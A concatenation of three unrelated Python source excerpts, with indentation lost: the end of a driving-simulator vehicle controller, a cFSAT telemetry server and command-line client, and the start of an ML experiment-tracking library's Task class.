return sensor_compass_bearing_rad
def compute_and_apply_control():
"""Computes control output using the detected objects from sensor suite."""
cur_position = get_self_position()
cur_speed_ms = get_self_speed_ms()
cur_yaw_angle = get_self_yaw_angle()
# Compute control
if self.path_following_tools.target_path is not None:
# Compute distance from front wheels for smoother turns:
temp_cur_pos = [cur_position[0] - (self.FRONT_TO_REAR_WHEELS_DISTANCE * math.sin(cur_yaw_angle) +
cur_speed_ms * 0.2 * math.sin(cur_yaw_angle)),
cur_position[1] + (self.FRONT_TO_REAR_WHEELS_DISTANCE * math.cos(cur_yaw_angle) +
cur_speed_ms * 0.2 * math.cos(cur_yaw_angle))]
(current_segment_ind, line_segment_as_list, nearest_pos_on_path, dist_to_seg_end) = \
self.path_following_tools.get_current_segment(temp_cur_pos, self.last_segment_ind)
(distance_err, angle_err) = \
self.path_following_tools.get_distance_and_angle_error(temp_cur_pos,
cur_yaw_angle,
last_segment_ind=self.last_segment_ind,
is_detouring=False)
self.last_segment_ind = current_segment_ind
if len(self.path_following_tools.path_details) > current_segment_ind:
(next_turn_angle, travel_distance) = self.path_following_tools.path_details[current_segment_ind]
travel_distance += dist_to_seg_end
else:
(next_turn_angle, travel_distance) = (0.0, 0.0)
else:
current_segment_ind = -1
angle_err = self.target_bearing - cur_yaw_angle
while angle_err > math.pi:
angle_err -= 2*math.pi
while angle_err < -math.pi:
angle_err += 2*math.pi
distance_err = -(self.target_lat_pos - cur_position[0])
(next_turn_angle, travel_distance) = (0.0, 0.0)
current_target_speed = \
self.target_speed_planner.get_current_target_speed(cur_time_ms=cur_time_ms,
cur_segment_ind=current_segment_ind)
if self.slow_at_intersection and abs(next_turn_angle) > math.pi/60 and travel_distance < 100.0:
turn_ratio = min(1.0, abs(next_turn_angle)/(math.pi/4.0))
max_speed_limit = 10.0 + ((1.0 - turn_ratio)*30.0)
# decrease speed limit as we approach to the intersection.
max_speed_limit = (max_speed_limit + (current_target_speed - max_speed_limit) *
((max(travel_distance, 10.0)-10.0)/80.0))
else:
max_speed_limit = current_target_speed
control_steering = self.lateral_controller.compute(angle_err,
distance_err,
cur_speed_ms)
speed_ratio = min(1.0, self.self_current_state[2]/22.0)
max_steering = 0.1 + (1.0 - speed_ratio)*0.7
control_steering = min(max(-max_steering, control_steering), max_steering)
if self.is_direct_speed_control:
# self.set_target_speed_and_angle(speed=controller_commons.speed_ms_to_kmh(10.0), angle=control_steering)
'''
v = 0.1
t = 0.3
global t1, v1, flag
if cur_time_ms==100:
self.set_target_speed_and_angle(speed=controller_commons.speed_ms_to_kmh(v), angle=control_steering)
elif cur_time_ms>=5000:
self.set_throttle(t)
# if cur_time_ms%200==0:
# print("time: "+str(cur_time_ms)+" vel: "+str(cur_speed_ms))
if abs(round(cur_speed_ms,0)-cur_speed_ms)<0.01:
t1 = cur_time_ms
v1 = cur_speed_ms
# print ("--> "+str(t1))
if cur_time_ms-t1 in (100,200,300,400,500,600,700,800,900,1000):
a = ((cur_speed_ms-v1)/(cur_time_ms-t1))*1000
# print("time: "+str(cur_time_ms)+" diff: "+str(cur_time_ms-t1)+" speed: "+str(round(v1,2)) + " acc: "+str(round(a,2)))
'''
# if cur_time_ms-t1 == 1000:
# a = ((cur_speed_ms-v1)/(cur_time_ms-t1))*1000
# print("time: "+str(cur_time_ms)+" diff: "+str(cur_time_ms-t1)+" speed: "+str(round(v1,2)) + " acc: "+str(round(a,2)))
if cur_time_ms<1010:
x = 4.0
self.set_target_speed_and_angle(speed= controller_commons.speed_ms_to_kmh(x) ,angle=control_steering)
else:
global time_index
if(target_t[time_index] < ((cur_time_ms/1000.0) -1) ):
time_index = time_index + 1
# x2 = exp_out[time_index][0]
# y2 = exp_out[time_index][1]
inc = 0.0
# if(time_index>0):
# t1 = exp_out[time_index-1][4]
# dt = cur_time_ms/1000.0 - 3 - t1
# x1 = exp_out[time_index-1][0]
# u1 = exp_out[time_index-1][3]
# a2 = exp_out[time_index][2]
# dx = u1*dt + 0.5*a2*dt*dt
# if(abs(x2-x1)==5.0):
# if( (dx-0.5)/abs(x2-x1)>(cur_position[1]-x1)/(x2-x1) ):
# inc = 0.05
# elif( (dx+0.5)/abs(x2-x1)<(cur_position[1]-x1)/(x2-x1) ):
# inc = -0.05
# else:
# inc = 0.0
# if(target_throttle[time_index])
self.set_throttle_and_steering_angle(target_throttle[time_index]+inc, control_steering)
# if cur_time_ms%100==0:
# global img_cnt
# img_name = "img_"+str(img_cnt)+".png"
# self.camera.saveImage("../../../images/"+img_name,1)
# img_cnt = img_cnt + 1
# data_dict[img_name] = [cur_speed_ms,target_throttle[time_index],control_steering]
# self.set_target_speed_and_angle(speed=controller_commons.speed_ms_to_kmh(min(max_speed_limit,
# current_target_speed)),
# angle=control_steering)
if cur_time_ms%500==0:
print("Time: "+str(cur_time_ms)+" Agent vehicle speed: "+str(cur_speed_ms) + " pos: "+str(cur_position))
else:
control_throttle = self.longitudinal_controller.compute(min(max_speed_limit, current_target_speed)
- cur_speed_ms)
self.set_throttle_and_steering_angle(control_throttle, control_steering)
if current_target_speed < 0.0:
# Emergency / sudden braking
self.set_brake(1.0)
self.set_throttle(0.0)
while self.step() >= 0:
sim_time = self.get_sim_time()
cur_time_ms = int(round(1000 * sim_time))
# -------------- Read Sensors----------------
# ************ Read GPS ************
(sensor_gps_position_m, sensor_gps_speed_m_s) = read_gps_sensor(self.gps)
# ************ Read Compass ************
sensor_compass_bearing_rad = read_compass_sensor(self.compass)
# -------------- Sensor Fusion ----------------
# ************ Sensor Fusion for own states (GPS + Compass) ************
if self.self_sensor_fusion_tracker is None:
self.self_current_state = [sensor_gps_position_m[0], sensor_gps_position_m[2], sensor_gps_speed_m_s,
sensor_compass_bearing_rad, 0.0]
if sensor_gps_speed_m_s > 50.0 or sensor_gps_speed_m_s < -20.0: # Filter out errors in read gps speed
sensor_gps_speed_m_s = 0.0
self.self_current_state[2] = sensor_gps_speed_m_s
if self.use_fusion:
# Initiate self sensor fusion tracker
self.self_sensor_fusion_tracker = SensorFusionTracker(initial_state_mean=self.self_current_state,
filter_type='ukf')
else:
if self.gps is not None and self.compass is not None:
measurement = [sensor_gps_position_m[0], sensor_gps_position_m[2], sensor_gps_speed_m_s,
sensor_compass_bearing_rad]
(self.self_current_state, state_cov) = self.self_sensor_fusion_tracker.get_estimates(
measurements=measurement, sensor_type=SensorFusionTracker.SENSOR_TYPE_GPS_COMPASS)
elif self.gps is not None:
measurement = [sensor_gps_position_m[0], sensor_gps_position_m[2], sensor_gps_speed_m_s]
(self.self_current_state, state_cov) = self.self_sensor_fusion_tracker.get_estimates(
measurements=measurement, sensor_type=SensorFusionTracker.SENSOR_TYPE_GPS)
elif self.compass is not None:
measurement = [sensor_compass_bearing_rad]
(self.self_current_state, state_cov) = self.self_sensor_fusion_tracker.get_estimates(
measurements=measurement, sensor_type=SensorFusionTracker.SENSOR_TYPE_COMPASS)
else:
self.self_current_state = [0.0, 0.0, 0.0, 0.0, 0.0]
# Read sensor-like information from Simulation Supervisor
if self.receiver is not None:
messages = self.contr_comm.receive_all_communication(self.receiver)
command_list = self.contr_comm.extract_all_commands_from_message(messages)
path_modified = False
for command_item in command_list:
command = command_item[0]
if command == ControllerCommunicationInterface.SET_CONTROLLER_PARAMETERS_MESSAGE:
parameter = command_item[1]
if parameter.get_vehicle_id() == self.self_vhc_id:
if parameter.get_parameter_name() == 'target_position':
parameter_data = parameter.get_parameter_data()
# print(parameter_data)
self.path_following_tools.add_point_to_path(parameter_data)
path_modified = True
elif parameter.get_parameter_name() == 'target_speed_at_time':
# 1st parameter is the start time for the target speed in seconds as float.
# 2nd: how long will the target speed be active in seconds -1 for infinite/until next.
# 3rd parameter is the target speed.
parameter_data = parameter.get_parameter_data()
if parameter_data[1] < 0:
target_length = math.inf
else:
target_length = int(round(1000 * parameter_data[1]))
self.target_speed_planner.add_target_speed_data(
TargetSpeedData(event_type='time',
start_time=int(round(1000 * parameter_data[0])),
length=target_length,
target_speed=parameter_data[2]))
elif parameter.get_parameter_name() == 'target_speed_at_segment':
# 1st parameter is the start segment index for the target speed.
# 2nd: how long will the target speed be active in seconds:
# -1 for infinite/until next, 0 for during the segment
# 3rd parameter is the target speed.
parameter_data = parameter.get_parameter_data()
if parameter_data[1] < 0:
target_length = -1
else:
target_length = int(round(1000 * parameter_data[1]))
self.target_speed_planner.add_target_speed_data(
TargetSpeedData(event_type='segment',
start_time=int(round(parameter_data[0])),
length=target_length,
target_speed=parameter_data[2]))
if path_modified:
self.path_following_tools.smoothen_the_path()
self.path_following_tools.populate_the_path_with_details()
# print(self.path_following_tools.target_path)
#----------Dynamic Path computation starts-------------------------
'''
if(cur_time_ms == 10):
cur_position = get_self_position()
t1 = threading.Thread(target=self.computeTargetPath, args=(cur_position,))
t1.start()
global suboptimalPath
if (cur_time_ms == 8000):
t1.join()
self.path_following_tools.target_path = None
self.path_following_tools.path_details = None
for pt in suboptimalPath:
self.path_following_tools.add_point_to_path(pt)
self.path_following_tools.smoothen_the_path()
self.path_following_tools.populate_the_path_with_details()
cur_position = suboptimalPath[-1]
t1 = threading.Thread(target=self.computeTargetPath, args=(cur_position,))
t1.start()
elif (cur_time_ms % 8000 == 0):
t1.join()
# print(suboptimalPath)
# cur_position = get_self_position()
# (cur_seg,line_seg,nearest_pos,dis) = self.path_following_tools.get_current_segment(cur_position,0,self.path_following_tools.target_path)
self.path_following_tools.target_path = self.path_following_tools.future_target_path
self.path_following_tools.path_details = self.path_following_tools.future_path_details
cur_position = suboptimalPath[-1]
t1 = threading.Thread(target=self.computeTargetPath, args=(cur_position,))
t1.start()
'''
#---------Dynamic Path computation end--------------------
compute_and_apply_control()
out_file = "../../../control_throttle.pkl"
with open(out_file, 'wb') as handle:
pickle.dump(data_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)
# Clean up
del self.classifier
del self.obj_tracker
print("Bye!")
sys.stdout.flush()
|
telemetry.py | """
Copyright 2022 Open STEMware Foundation
All Rights Reserved.
This program is free software; you can modify and/or redistribute it under
the terms of the GNU Affero General Public License as published by the Free
Software Foundation; version 3 with attribution addendums as found in the
LICENSE.txt
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
details.
This program may also be used under the terms of a commercial or enterprise
edition license of cFSAT if purchased from the copyright holder.
Purpose:
Define a Telemetry interface with the main function serving as a
command line utility.
Notes:
1. The class designs are based on the Observer Design Pattern and they
also correlate with netwroking roles.
-----------------------------------------------------------
| Class | Design Patttern Role | Network Role |
--------------------|----------------------|---------------
| TelemetryMessage | Subject | None |
--------------------|----------------------|---------------
| TelemetryServer | Supply Subject data | Server |
--------------------|----------------------|---------------
| TelemetryObserver | Observer | Client |
-----------------------------------------------------------
"""
from __future__ import annotations
from abc import ABC, abstractmethod
import os
import sys
import configparser
import socket
import time
import threading
import traceback
import inspect
from typing import List
from datetime import datetime
import logging
logger = logging.getLogger(__name__)
if __name__ == '__main__' or 'cfsinterface' in os.getcwd():
sys.path.append('..')
from edsmission import EdsMission
from edsmission import CfeEdsTarget
else:
from .edsmission import EdsMission
from .edsmission import CfeEdsTarget
from tools import hex_string
###############################################################################
class TelemetryMessage:
"""
Plays the 'subject' role in the Observer design pattern. The interface
declares a set of methods for managing subscribers. An abstract base
class is not needed since the events are restricted to telemetry
messages.
Contains the most recent telemetry values. This class is intentionally kept simple and
additional 'business' logic is performed by the observer of this packet.
"""
def __init__(self, app_name, msg_name, app_id):
self.app_name = app_name
self.msg_name = msg_name
self.app_id = app_id
self.update_time = None # Ground time when FSW tlm received
self.eds_entry = None
self.eds_obj = None
self.observers: List[TelemetryObserver] = []
def attach(self, observer: TelemetryObserver) -> None:
self.observers.append(observer)
def detach(self, observer: TelemetryObserver) -> None:
self.observers.remove(observer)
def get_eds_obj(self):
return self.eds_obj #Using a tuple tried to iterate over the eds_obj: [self.eds_obj, self.update_time]
def pri_hdr(self):
return self.eds_obj.CCSDS
def sec_hdr(self):
return self.eds_obj.Sec
def payload(self):
return self.eds_obj.Payload
def update(self, eds_entry, eds_obj) -> None:
"""
Trigger an update in each subscriber.
"""
self.eds_entry = eds_entry
self.eds_obj = eds_obj
self.update_time = datetime.now()
#print("@DEBUG@eds_entry = " + str(eds_entry))
#print("@DEBUG@eds_obj = " + str(eds_obj))
logger.debug("TelemetryMessage: Notifying observers...")
for observer in self.observers:
observer.update(self)
###############################################################################
class TelemetryObserver(ABC):
"""
The Observer interface declares the notify method, used by subjects. Unlike
TelemetryMessage, an abstract base class is defined because there are
different observer scenarios (i.e. GUI vs scripting) that need to be
accommodated.
"""
def __init__(self, tlm_server: TelemetryServer):
self.tlm_server = tlm_server
@abstractmethod
def update(self, tlm_msg: TelemetryMessage) -> None:
"""
Receive telemetry updates
"""
pass
###############################################################################
class TelemetryServer(CfeEdsTarget):
"""
Abstract class that defines an EDS-defined telemetry server interface. It
uses the EdsMission database for telemetry message definitions.
Concrete child classes provide the mechanism for receiving telemetry:
- _recv_tlm_handler() runs in a thread that ingests tlm messages
- server_observer is a user supplied function that processes messages
within the context of the child class's environment
"""
def __init__(self, mission, target):
super().__init__(mission, target, EdsMission.TELEMETRY_IF)
self._recv_tlm_thread = None
self.server_observer = None
self.lookup_appid = {} # Used 'app_name-tlm_msg_name' to retrieve app_id
self.tlm_messages = {} # The eds_obj in a tlm msg holds the most recent values
for topic in self.topic_dict:
if topic != EdsMission.TOPIC_TLM_TITLE_KEY:
(app_name, tlm_msg_name) = self.parse_topic(topic)
app_id = self.get_app_id(app_name,tlm_msg_name)
logger.info("TelemetryServer constructor adding App: %s, Msg %s, Id: %d" % (app_name, tlm_msg_name, app_id))
self.tlm_messages[app_id] = TelemetryMessage(app_name, tlm_msg_name, app_id)
self.lookup_appid[self.join_app_msg(app_name, tlm_msg_name)] = app_id
def get_tlm_param_val(self, base_object, parameter, obj_name):
"""
Recursive function that iterates over an EDS object to locate the
parameter and return its value.
Inputs:
base_object - The EDS object to iterate over
parameter - Name of the parameter to locate
obj_name - Name of EDS object currently being processed. Initially None
and gets filled in by the recursive calls. Assumes top-level
object is a container.
"""
#TODO: print("\n\n***get_tlm_param_val()***")
if obj_name is None:
return_value = None
# Array
if (self.eds_mission.lib_db.IsArray(base_object)):
#TODO: print("[[[[[[[[[[[[[Array base_object inspect = " + str(inspect.getmembers(base_object))+"\n")
#TODO: print("[[[[[[[[[[[[[Array base_object dir = " + str(base_object())+"\n")
#TODO: if obj_name is not None:
#TODO: print('array obj_name = ' + str(obj_name))
for i in range(len(base_object)):
return_value = self.get_tlm_param_val(base_object[i], parameter, obj_name)
if return_value is not None:
return return_value
#TODO: print("base_object[i] = " + str(base_object[i]))
# Container
elif (self.eds_mission.lib_db.IsContainer(base_object)):
#TODO: print("{{{{{{{{{{{{{Container base_object= " + str(base_object)+"\n")
for item in base_object:
return_value = self.get_tlm_param_val(item[1], parameter, item[0])
if return_value is not None:
return return_value
# Everything else (number, enumeration, string, etc.)
else:
#print(">>>>base_object value " + str(base_object)+"\n")
return_value = None
if obj_name is not None:
#TODO: print(">>>>%s = " % obj_name)
if obj_name == parameter:
#TODO: print("********* FOUND OBJECT *************")
return_value = base_object
return return_value
def get_tlm_val(self, app_name, tlm_msg_name, parameter):
"""
todo: This is limited to uniquely named parameters
"""
value = None
app_id = self.lookup_appid[self.join_app_msg(app_name, tlm_msg_name)]
tlm_msg = self.tlm_messages[app_id]
#TODO: print("***tlm_msg: %s %s %s" % (tlm_msg.app_name, tlm_msg.msg_name, parameter))
eds_obj = tlm_msg.get_eds_obj()
if eds_obj is not None:
value = self.get_tlm_param_val(eds_obj, parameter, None)
#TODO: print("***value = " + str(value))
return value
def join_app_msg(self, app_name, tlm_msg_name):
return app_name+'-'+tlm_msg_name
def parse_topic(self, topic_name):
"""
Assumes the following syntax for a telemetry topic: APP_NAME/Application/TLM_NAME
"""
topic_token = topic_name.split('/')
return (topic_token[0], topic_token[2])
def get_tlm_msg_from_topic(self,topic_name):
app_name, tlm_msg_name = self.parse_topic(topic_name)
app_id = self.get_app_id(app_name, tlm_msg_name)
tlm_msg = None
if app_id in self.tlm_messages:
tlm_msg = self.tlm_messages[app_id]
return tlm_msg
def add_tlm_messages(self, tlm_msg_dict):
for msg in tlm_msg_dict:
self.tlm_messages[tlm_msg_dict[msg].app_id] = tlm_msg_dict[msg]
def add_msg_observer(self, tlm_msg: TelemetryMessage, tlm_msg_observer: TelemetryObserver):
if tlm_msg.app_id in self.tlm_messages:
self.tlm_messages[tlm_msg.app_id].attach(tlm_msg_observer)
else:
print("Failed to attach telemetry observer. App ID %d is not in the telemetry server database" % tlm_msg.app_id)
def remove_msg_observer(self, tlm_msg: TelemetryMessage, tlm_msg_observer: TelemetryObserver):
if tlm_msg.app_id in self.tlm_messages:
self.tlm_messages[tlm_msg.app_id].detach(tlm_msg_observer)
else:
print("Failed to detach telemetry observer. App ID %d is not in the telemetry server database" % tlm_msg.app_id)
def get_app_id(self, app_name, tlm_msg_name):
"""
#todo: Define a global invalid app ID value
#todo: Where should XML dependencies be defined?
#todo: Can self.lookup_appid replace this?
"""
topic_name = app_name.upper() + '/Application/' + tlm_msg_name.upper()
app_id = -1
if topic_name in self.topic_dict:
app_id = self.topic_dict[topic_name] + 3 #todo: Clueless on the '+3' but that's what gets generated during runtime
return app_id
def add_server_observer(self, server_observer):
"""
"""
self.server_observer = server_observer
@abstractmethod
def _recv_tlm_handler(self):
# If this handler is part fo a GUI then a time.sleep() is needed to prevent updates from
# being sent before the GUI is fully initialized
raise NotImplementedError
def execute(self):
self._recv_tlm_thread = threading.Thread(target=self._recv_tlm_handler)
self._recv_tlm_thread.kill = False
self._recv_tlm_thread.start()
self._recv_tlm_thread.join()
def shutdown(self):
self._recv_tlm_thread.kill = True
logger.info("Telemetry Server shutting down")
###############################################################################
class TelemetrySocketServer(TelemetryServer):
"""
Manage a socket-based telemetry server.
"""
def __init__(self, mission, target, host_addr, recv_tlm_port, recv_tlm_timeout):
super().__init__(mission, target)
self.host_addr = host_addr
self.recv_tlm_port = recv_tlm_port
self.recv_tlm_socket_addr = (self.host_addr, self.recv_tlm_port)
self.recv_tlm_timeout = recv_tlm_timeout
self.recv_tlm_socket = None
try:
self.recv_tlm_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print("Error creating TelemetrySocketServer socket")
logger.error("Error creating TelemetrySocketServer socket")
self._recv_tlm_thread = None
def _recv_tlm_handler(self):
print("TelemetrySocketServer started receive telemetry handler thread")
time.sleep(2.0) #todo: Wait for GUI to init. If cFS running an event message occurs before GUI is up it will crash the system
# Constructor sets a timeout so the thread will terminate if no packets
while not self._recv_tlm_thread.kill:
try:
datagram, host = self.recv_tlm_socket.recvfrom(4096) #TODO: Allow configurable buffer size
# Only accept datagrams with mimimum length of a telemetry header
if len(datagram) > 6:
if self.server_observer != None:
self.server_observer(datagram, host)
try:
eds_entry, eds_obj = self.eds_mission.decode_message(datagram)
#self.eds_objects[eds_entry.Name] = eds_obj
app_id = int(eds_obj.CCSDS.AppId)
logger.debug("Msg name: %s, Msg Id: %d " % (eds_entry.Name,app_id))
if app_id in self.tlm_messages:
logger.debug("Calling tlm message update()...")
self.tlm_messages[app_id].update(eds_entry, eds_obj)
except RuntimeError:
logger.error("EDS datagram decode exception. Datagram = \n %s\n", str(datagram))
logger.error(traceback.print_exc())
except socket.timeout:
pass
#print('Ignored socket error...')
#time.sleep(0.5)
logger.info("TelemetrySocketServer terminating receive telemetry handler thread")
def execute(self):
print("Starting telemetry server for " + str(self.recv_tlm_socket_addr))
self.recv_tlm_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.recv_tlm_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.recv_tlm_socket.bind(self.recv_tlm_socket_addr)
self.recv_tlm_socket.setblocking(False)
self.recv_tlm_socket.settimeout(self.recv_tlm_timeout)
self._recv_tlm_thread = threading.Thread(target=self._recv_tlm_handler)
self._recv_tlm_thread.kill = False
self._recv_tlm_thread.start()
def shutdown(self):
self._recv_tlm_thread.kill = True
logger.info("TelemetrySocketServer shutting down")
###############################################################################
class TelemetryQueueServer(TelemetryServer):
"""
Manage a queue-based telemetry server.
"""
def __init__(self, mission, target, tlm_router_queue):
super().__init__(mission, target)
self.tlm_router_queue = tlm_router_queue
self._recv_tlm_thread = None
def _recv_tlm_handler(self):
logger.info("TelemetryQueueServer started receive telemetry handler thread")
time.sleep(1.0) #todo: Wait for GUI to init. If cFS running an event message occurs before GUI is up it will crash the system
while not self._recv_tlm_thread.kill:
while not self.tlm_router_queue.empty():
datagram, host = self.tlm_router_queue.get()
# Only accept datagrams with mimimum length of a telemetry header
if len(datagram) > 6:
if self.server_observer != None:
self.server_observer(datagram, host)
try:
eds_entry, eds_obj = self.eds_mission.decode_message(datagram)
app_id = int(eds_obj.CCSDS.AppId)
logger.debug("Msg name: %s, Msg Id: %d " % (eds_entry.Name,app_id))
if app_id in self.tlm_messages:
logger.debug("Calling tlm message update()...")
self.tlm_messages[app_id].update(eds_entry, eds_obj)
except RuntimeError:
logger.error("EDS datagram decode exception. Datagram = \n %s\n", str(datagram))
logger.error(traceback.print_exc())
time.sleep(0.5)
logger.info("TelemetryQueueServer terminating receive telemetry handler thread")
def execute(self):
self._recv_tlm_thread = threading.Thread(target=self._recv_tlm_handler)
self._recv_tlm_thread.kill = False
self._recv_tlm_thread.start()
def shutdown(self):
self._recv_tlm_thread.kill = True
logger.info("TelemetryQueueServer shutting down")
###############################################################################
class TelemetryCmdLineClient(TelemetryObserver):
"""
Command line tool to Helpful
for informal verification of a system configuration.
"""
def __init__(self, tlm_server: TelemetryServer, monitor_server = False):
super().__init__(tlm_server)
if monitor_server:
self.tlm_server.add_server_observer(self.process_datagram)
for msg in self.tlm_server.tlm_messages:
self.tlm_server.add_msg_observer(self.tlm_server.tlm_messages[msg], self)
def display_entries(self, base_object, base_name):
"""
Recursive function that iterates over an EDS object and prints the contents of
the sub-entries to the screen
Inputs:
eds_db - EDS Database
base_object - The EDS object to iterate over
base_name - The base name for the sub-entities printed to the screen
"""
# Array display string
if (self.tlm_server.eds_mission.lib_db.IsArray(base_object)):
#print("@DEBUG@display_entries()-array: base_object = " + str(base_object))
#print("@DEBUG@display_entries()-array: base_name = " + str(base_name))
for i in range(len(base_object)):
self.display_entries(base_object[i], f"{base_name}[{i}]")
# Container display string
elif (self.tlm_server.eds_mission.lib_db.IsContainer(base_object)):
#print("@DEBUG@display_entries()-container: base_object = " + str(base_object))
#print("@DEBUG@display_entries()-container: base_name = " + str(base_name))
for item in base_object:
self.display_entries(item[1], f"{base_name}.{item[0]}")
# Everything else (number, enumeration, string, etc.)
else:
print('{:<60} = {}'.format(base_name, base_object))
def process_datagram(self, datagram, host):
print(f"Telemetry Packet From: {host[0]}:UDP {host[1]}, {8*len(datagram)} bits :")
print(hex_string(datagram.hex(), 16))
eds_entry, eds_object = self.tlm_server.eds_mission.decode_message(datagram)
self.display_entries(eds_object, eds_entry.Name)
print("\n")
def update(self, tlm_msg: TelemetryMessage) -> None:
"""
Receive telemetry updates
"""
print("Received telemetry message app ID %d at time %d" % (tlm_msg.app_id, tlm_msg.sec_hdr().Seconds))
def reverse_eng(self):
"""
"""
CFE_ES_HK = [
0x08, 0x40, 0xD7, 0xC2, 0x00, 0x96, 0x00, 0x10, 0x38, 0x3F, 0x00, 0x1E, 0x00, 0x00, 0xD2, 0x46,
0x06, 0x07, 0x63, 0x00, 0x05, 0x00, 0x00, 0xFF, 0x01, 0x04, 0x00, 0x63, 0x00, 0x00, 0x0C, 0x00,
0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x4E, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
0x03, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00,
0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0xF0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]
eds_entry, eds_obj = self.tlm_server.eds_mission.decode_message(bytes(CFE_ES_HK))
print("@REVERSE: eds_entry type %s, value: %s" % (str(type(eds_entry)), str(eds_entry)))
print("@REVERSE: eds_obj type %s, value: %s" % (str(type(eds_obj)), str(eds_obj)))
self.display_entries(eds_obj, eds_entry.Name)
eds_entry = self.tlm_server.eds_mission.get_database_named_entry('CFE_ES/HousekeepingTlm')
print("@REVERSE: eds_entry type: %s\n@@dir: %s\n@@value: %s" % (str(type(eds_entry)), str(dir(eds_entry)), str(eds_entry)))
eds_obj = eds_entry()
print("@REVERSE: eds_obj type: %s\n@@dir: %s\n@@value: %s" % (str(type(eds_obj)), str(dir(eds_obj)), str(eds_obj)))
pri_hdr = eds_obj.CCSDS
print("@REVERSE: pri_hdr type: %s\n@@dir: %s\n@@value: %s" % (str(type(pri_hdr)), str(dir(pri_hdr)), str(pri_hdr)))
sec_hdr = eds_obj.Sec
print("@REVERSE: sec_hdr type: %s\n@@dir: %s\n@@value: %s" % (str(type(sec_hdr)), str(dir(sec_hdr)), str(sec_hdr)))
payload = eds_obj.Payload
print("@REVERSE: payload type: %s\n@@dir: %s\n@@value: %s" % (str(type(payload)), str(dir(payload)), str(payload)))
###############################################################################
def main():
config = configparser.ConfigParser()
config.read('../cfsat.ini')
MISSION = config.get('CFS_TARGET', 'MISSION_EDS_NAME')
CFS_TARGET = config.get('CFS_TARGET', 'CPU_EDS_NAME')
HOST_ADDR = config.get('NETWORK','CFS_HOST_ADDR')
TLM_PORT = config.getint('NETWORK','CFS_RECV_TLM_PORT')
CFS_TARGET_TLM_TIMEOUT = config.getint('CFS_TARGET','RECV_TLM_TIMEOUT')
system_string = "Mission: %s, Target: %s, Host: %s, Telemetry Port %d" % (MISSION, CFS_TARGET, HOST_ADDR, TLM_PORT)
try:
telemetry_server = TelemetrySocketServer(MISSION, CFS_TARGET, HOST_ADDR, TLM_PORT, CFS_TARGET_TLM_TIMEOUT)
telemetry_cmd_line_client = TelemetryCmdLineClient(telemetry_server, True)
print ("Telemetry objects created for " + system_string)
except RuntimeError:
print("Error creating telemetry object for " + system_string)
sys.exit(2)
#telemetry_cmd_line_client.reverse_eng()
telemetry_server.execute()
if __name__ == "__main__":
main()
|
task.py | import atexit
import os
import signal
import sys
import threading
import time
from argparse import ArgumentParser
from collections import OrderedDict, Callable
import psutil
import six
from .backend_api.services import tasks, projects
from .backend_api.session.session import Session
from .backend_interface.model import Model as BackendModel
from .backend_interface.task import Task as _Task
from .backend_interface.task.args import _Arguments
from .backend_interface.task.development.worker import DevWorker
from .backend_interface.task.repo import ScriptInfo
from .backend_interface.util import get_single_result, exact_match_regex, make_message
from .config import config, PROC_MASTER_ID_ENV_VAR, DEV_TASK_NO_REUSE
from .config import running_remotely, get_remote_task_id
from .config.cache import SessionCache
from .debugging.log import LoggerRoot
from .errors import UsageError
from .logger import Logger
from .model import InputModel, OutputModel, ARCHIVED_TAG
from .task_parameters import TaskParameters
from .binding.environ_bind import EnvironmentBind
from .binding.absl_bind import PatchAbsl
from .utilities.args import argparser_parseargs_called, get_argparser_last_args, \
argparser_update_currenttask
from .binding.frameworks.pytorch_bind import PatchPyTorchModelIO
from .binding.frameworks.tensorflow_bind import PatchSummaryToEventTransformer, PatchTensorFlowEager, \
PatchKerasModelIO, PatchTensorflowModelIO
from .utilities.resource_monitor import ResourceMonitor
from .binding.matplotlib_bind import PatchedMatplotlib
from .utilities.seed import make_deterministic
NotSet = object()
class Task(_Task):
"""
Task (experiment) object represents the current running experiments and connects all the different parts into \
a fully reproducible experiment
Common usage is calling Task.init() to initialize the main task.
The main task is development / remote execution mode-aware, and supports connecting various SDK objects
such as Models etc. In development mode, the main task supports task reuse (see Task.init() for more
information in development mode features).
Any subsequent call to Task.init() will return the already-initialized main task
and will not create a new main task.
Sub-tasks, meaning tasks which are not the main task and are not development / remote execution mode aware, can be
created using Task.create(). These tasks do no support task reuse and any call
to Task.create() will always create a new task.
You can also query existing tasks in the system by calling Task.get_task().
**Usage: Task.init(...), Task.create() or Task.get_task(...)**
"""
TaskTypes = _Task.TaskTypes
__create_protection = object()
__main_task = None
__exit_hook = None
__task_id_reuse_time_window_in_hours = float(config.get('development.task_reuse_time_window_in_hours', 24.0))
__store_diff_on_train = config.get('development.store_uncommitted_code_diff_on_train', False)
__detect_repo_async = config.get('development.vcs_repo_detect_async', False)
class _ConnectedParametersType(object):
argparse = "argument_parser"
dictionary = "dictionary"
task_parameters = "task_parameters"
@classmethod
def _options(cls):
return {
var for var, val in vars(cls).items()
if isinstance(val, six.string_types)
}
def __init__(self, private=None, **kwargs):
"""
**Do not construct Task manually!**
please use Task.current_task() or Task.get_task(id=, project=, name=)
"""
if private is not Task.__create_protection:
raise UsageError(
